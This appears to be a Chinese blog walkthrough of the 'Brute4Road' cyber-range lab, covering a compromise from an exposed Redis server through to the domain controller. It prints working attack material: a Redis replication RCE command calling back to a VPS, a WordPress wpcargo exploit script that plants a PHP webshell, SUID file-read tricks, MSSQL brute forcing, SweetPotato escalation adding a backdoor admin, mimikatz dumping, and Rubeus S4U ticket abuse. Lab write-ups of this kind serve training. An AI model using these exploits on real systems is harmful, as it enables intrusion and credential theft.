春秋云境-Brute4Road

春秋云境-Brute4Road

信息收集

直接访问80端口,还是没啥可操作的

还是fscan开扫吧

1
.\fscan64.exe -h 39.98.112.117 -p 1-65535
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
   ___                              _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.112.117 is alive
[*] Icmp alive hosts len is: 1
39.98.112.117:21 open
39.98.112.117:22 open
39.98.112.117:80 open
39.98.112.117:6379 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.98.112.117 code:200 len:4833 title:Welcome to CentOS
[+] Redis:39.98.112.117:6379 unauthorized file:/usr/local/redis/db/dump.rdb
[+] ftp://39.98.112.117:21:anonymous
[->]pub
已完成 4/4
[*] 扫描结束,耗时: 5m26.0972385s

扫出来个redis未授权

redis主从复制rce

发现版本较低,redis在4.x/5.0.5以前版本下,可以用主从复制getshell

1
python3 redis-rce.py -r 39.98.112.117 -p 6379 -L VPSip -f exp.so

这里直接选择正向shell就好了

suid base64提权

试试suid提权

1
find / -user root -perm -4000 -print 2> 1.txt

有个base64可以利用,例如

1
2
3
cd /etc
LFILE=shadow
base64 "$LFILE" | base64 --decode

这里直接用它来读flag

1
base64 "/home/redis/flag/flag01" | base64 --decode

还是换反向shell把,填入监听的ip和端口

再提升一下shell的交互性

1
python -c 'import pty; pty.spawn("/bin/bash")'

接下来wget下载fscan扫内网

1
wget http://vps/fscan_amd64
1
chmod +x fscan_amd64

中途重启了一下环境

看一下

1
hostnamea -i

内网信息收集

1
./fscan_amd64 -h 172.22.2.0/16 >> 2.txt
1
cat 2.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
172.22.2.16:445 open
172.22.2.3:445 open
172.22.2.34:139 open
172.22.2.16:139 open
172.22.2.18:139 open
172.22.2.34:135 open
172.22.2.3:139 open
172.22.2.16:135 open
172.22.2.3:135 open
172.22.2.16:80 open
172.22.2.18:80 open
172.22.2.7:80 open
172.22.2.18:22 open
172.22.2.7:21 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.18:445 open
172.22.2.7:22 open
172.22.2.7:6379 open
172.22.2.3:88 open
[*] alive ports len is: 20
start vulscan
[*] WebTitle: http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] NetInfo:
[*]172.22.2.34
[->]CLIENT01
[->]172.22.2.34
[*] NetInfo:
[*]172.22.2.3
[->]DC
[->]172.22.2.3
[*] NetBios: 172.22.2.34 XIAORANG\CLIENT01
[*] NetInfo:
[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16
[*] 172.22.2.3 (Windows Server 2016 Datacenter 14393)
[*] 172.22.2.16 (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.2.16 code:404 len:315 title:Not Found
[*] NetBios: 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.3 [+]DC DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[+] ftp://172.22.2.7:21:anonymous
[->]pub
[*] WebTitle: http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点

传frp,给权限执行

1
2
./frps -c ./frps.toml
./frpc -c ./frpc.toml

代理出来流量

Wordpress nday getshell

接下来打那个wordpress,有一个插件有nday

可以用wpscan扫描

1
wpscan --url http://example

能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的
漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。不仅能够扫描类似robots. txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import sys

import binascii

import requests



# This is a magic string that when treated as pixels and compressed using the png

# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file

payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'



def encode_character_code(c: int):

return '{:08b}'.format(c).replace('0', 'x')



text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]



destination_url = 'http://172.22.2.18/'

cmd = 'ls'



# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.

requests.get(

f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"

)



# We have uploaded a webshell - now let's use it to execute a command.

print(requests.post(

f"{destination_url}webshell.php?1=system", data={"2": cmd}

).content.decode('ascii', 'ignore'))

写入木马webshell.php

翻文件,在配置文件找到数据库账号密码

1
WpuserEha8Fgj9

通过蚁剑连接上

数据库爆破拿下另一台主机

用S0meth1ng_y0u_m1ght_1ntereSted给的密码表里面的密码去爆破

1
2
3
[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16
1
2
fscan -h 172.22.2.16 -m mssql -pwdf 1.txt
[+] mssql:172.22.2.16:1433:sa ElGNkOiC

再MDUT连接,传SweetPotato提权

1
C:/Users/Public/SweetPotato.exe -a "whoami"
1
C:/Users/Public/SweetPotato.exe -a "type C:\Users\Administrator\flag\flag03.txt"

申请票据拿下域控

1
netstat -ano

会发现远程桌面端口(3389)是开着的

利用命令创建用户然后远程连接

1
2
C:/Users/Public/sweetpotato.exe -a "net user hey qwer1234! /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators hey /add"

1
systeminfo

发现域

上mimikatz!管理员模式打开

1
2
privilege::debug
sekurlsa::logonpasswords

尝试能否读密码

可以得到MSSQLSERVER$这个用户的NTLM,同时BloodHound分析MSSQLSERVER 配置了到域控的约束委派, 可以通过 S4U 伪造高权限 ST 拿下域控,

用Rubeus申请访问自身的服务票据

1
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:0e5d39e29de768a96183420b878af977 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

注入票据

1
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:你上面抓到的服务票据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 0e5d39e29de768a96183420b878af977
[*] Building AS-REQ (w/ preauth) for: 'xiaorang.lab\MSSQLSERVER$'
[*] Using domain controller: 172.22.2.3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE1XAfsMSOogZSvDqNJnaNAhIAqzTFM4eGq2IXa+yYpT6p2mVP41nBaeqdQkIwd9zc5YolopdAJqZdKfdFf3cVMn8XY0qCiuqcpRFgEHIEzHkbhuBIaBQc005DrU0vEZshXYq11E+yZMQ5GA5LTGn/fYDpZR62TGR+AHYjnXOxV0mtKg8uhAf1vfkG6z08YbpwH61Z70oYpvkto9YRd4vDCBT8PcFoBYsMIr0AwhsNIZN2jX0g7g9J7SNvpYTfClRXYj+/uLnGFcpas5CVonFqIS44XMVBkCu1ag4H0aLS8/AbpLZo6B9xjDhm2qOJN/iy8ECROB86Ted+pnW7ioprw3wWzVsLpaBWSJdpyXZC6mVSdkR9u3vXtcJl9MXcttylgvcdc7h4TtMNPkalExopAjFBfoM8C4ouSux8Dzm/34GaRrILDLXbbwh4elX44t/ckxvjZA4RU6RIYN/1aldRrDDtlTAKxIgPCfqJxJE44cttAH1M8iqxwpQnQ69ROltaOjhTfYYABCSeKaPPix4sQFp5nQjAxf8P28WNc8T8xrEW1k73DKJnV9XNzHW3WdgyBhrhyFqs859BGeidYitfgGlXEcLErGvlH+OsRMBxJZtKlc9Y+Q8BpTtaN5KmHQElGacrOhKnMJ34tWqx4elDlFKiscUiDKMPM0LkfHfz01W7oN3EJNJqBa5awQspp8oRV9AXeS+52xh8lnqMDoW32fOYYbXImuvPHuAJSVt4ijW8NG/Lt3aQq+6G3v9BlTO7319yKQAU7xNd9b1A4WClbcmGFlooTTY1u9BKySu2z3JeY9LNjDL3u3izQoiawpWtBaJLcnJPNYRrL2xLH2o2hg9cCYcRC+K0SipjVBllVeWby+gKqEAQ/BuOXaEpu4S/gWel685+kHXUQRk1TgtmiuT0r788q8BpnJhVFhSuLpRLZ3XtJl4W26+B/197PZlJVYa8dYq1Y7k005c813P+i7zoX1bsxaBZpGvRbe4mpgVbJJgctU3SR71XF3X2Yr6RD6aY8ywqNc3BmOQHz03ACNZc17sf3NB4e7PEudsjLSdFkxZup7o49iRn6TERJcqkYSpRAmD4UJ5yJLds7XqTJnNua3RCIYFfOiPRgzYpJ0cTFdB9fj+49GgX5zCW+rWOKrW/dOghUO4PWTyZ8pHNlWO6J/BHQsLxxWAtGhWaNuPX2wdfHMP36G4sevekvSZ1ZGkMwefFNtGbwkSs5nSDFykzWyvODB5GScsYrOk1lPktg9li71hMeCA9AXHeSiU7vp18Xf6DXhaw0tsyGZTC9CfTc1Vf4Sk1sflB8MTWL+AckNDJQvwZlH5G1F1oZf3KZVJil5/D20ix/QZw294GTbXN9NlJ/jw1bO9xXS5IX/84Z9o4XsH5dvfLoDNywMEqrGMWbBzthCeBq+HejkAokgBpkyhjJqb2ZPSRcswwnsWbU1I7+zNQOpkDAA3MSjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBBEemHaVOqc3A0olVCRzTb8oQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI0MDEyOTExNTEyOVqmERgPMjAyNDAxMjkyMTUxMjlapxEYDzIwMjQwMjA1MTE1MTI5WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

ServiceName : krbtgt/xiaorang.lab
ServiceRealm : XIAORANG.LAB
UserName : MSSQLSERVER$
UserRealm : XIAORANG.LAB
StartTime : 2024/1/29 19:51:29
EndTime : 2024/1/30 5:51:29
RenewTill : 2024/2/5 19:51:29
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : RHph2lTqnNwNKJVQkc02/A==
ASREP (key) : 0E5D39E29DE768A96183420B878AF977
1
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE1XAfsMSOogZSvDqNJnaNAhIAqzTFM4eGq2IXa+yYpT6p2mVP41nBaeqdQkIwd9zc5YolopdAJqZdKfdFf3cVMn8XY0qCiuqcpRFgEHIEzHkbhuBIaBQc005DrU0vEZshXYq11E+yZMQ5GA5LTGn/fYDpZR62TGR+AHYjnXOxV0mtKg8uhAf1vfkG6z08YbpwH61Z70oYpvkto9YRd4vDCBT8PcFoBYsMIr0AwhsNIZN2jX0g7g9J7SNvpYTfClRXYj+/uLnGFcpas5CVonFqIS44XMVBkCu1ag4H0aLS8/AbpLZo6B9xjDhm2qOJN/iy8ECROB86Ted+pnW7ioprw3wWzVsLpaBWSJdpyXZC6mVSdkR9u3vXtcJl9MXcttylgvcdc7h4TtMNPkalExopAjFBfoM8C4ouSux8Dzm/34GaRrILDLXbbwh4elX44t/ckxvjZA4RU6RIYN/1aldRrDDtlTAKxIgPCfqJxJE44cttAH1M8iqxwpQnQ69ROltaOjhTfYYABCSeKaPPix4sQFp5nQjAxf8P28WNc8T8xrEW1k73DKJnV9XNzHW3WdgyBhrhyFqs859BGeidYitfgGlXEcLErGvlH+OsRMBxJZtKlc9Y+Q8BpTtaN5KmHQElGacrOhKnMJ34tWqx4elDlFKiscUiDKMPM0LkfHfz01W7oN3EJNJqBa5awQspp8oRV9AXeS+52xh8lnqMDoW32fOYYbXImuvPHuAJSVt4ijW8NG/Lt3aQq+6G3v9BlTO7319yKQAU7xNd9b1A4WClbcmGFlooTTY1u9BKySu2z3JeY9LNjDL3u3izQoiawpWtBaJLcnJPNYRrL2xLH2o2hg9cCYcRC+K0SipjVBllVeWby+gKqEAQ/BuOXaEpu4S/gWel685+kHXUQRk1TgtmiuT0r788q8BpnJhVFhSuLpRLZ3XtJl4W26+B/197PZlJVYa8dYq1Y7k005c813P+i7zoX1bsxaBZpGvRbe4mpgVbJJgctU3SR71XF3X2Yr6RD6aY8ywqNc3BmOQHz03ACNZc17sf3NB4e7PEudsjLSdFkxZup7o49iRn6TERJcqkYSpRAmD4UJ5yJLds7XqTJnNua3RCIYFfOiPRgzYpJ0cTFdB9fj+49GgX5zCW+rWOKrW/dOghUO4PWTyZ8pHNlWO6J/BHQsLxxWAtGhWaNuPX2wdfHMP36G4sevekvSZ1ZGkMwefFNtGbwkSs5nSDFykzWyvODB5GScsYrOk1lPktg9li71hMeCA9AXHeSiU7vp18Xf6DXhaw0tsyGZTC9CfTc1Vf4Sk1sflB8MTWL+AckNDJQvwZlH5G1F1oZf3KZVJil5/D20ix/QZw294GTbXN9NlJ/jw1bO9xXS5IX/84Z9o4XsH5dvfLoDNywMEqrGMWbBzthCeBq+HejkAokgBpkyhjJqb2ZPSRcswwnsWbU1I7+zNQOpkDAA3MSjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBBEemHaVOqc3A0olVCRzTb8oQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI0MDEyOTExNTEyOVqmERgPMjAyNDAxMjkyMTUxMjlapxEYDzIwMjQwMjA1MTE1MTI5WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

然后就拿到域控,读取flag就行了


春秋云境-Brute4Road
https://www.smal1.black/春秋云境-Brute4Road.html
作者
Small Black
发布于
2024年1月29日
许可协议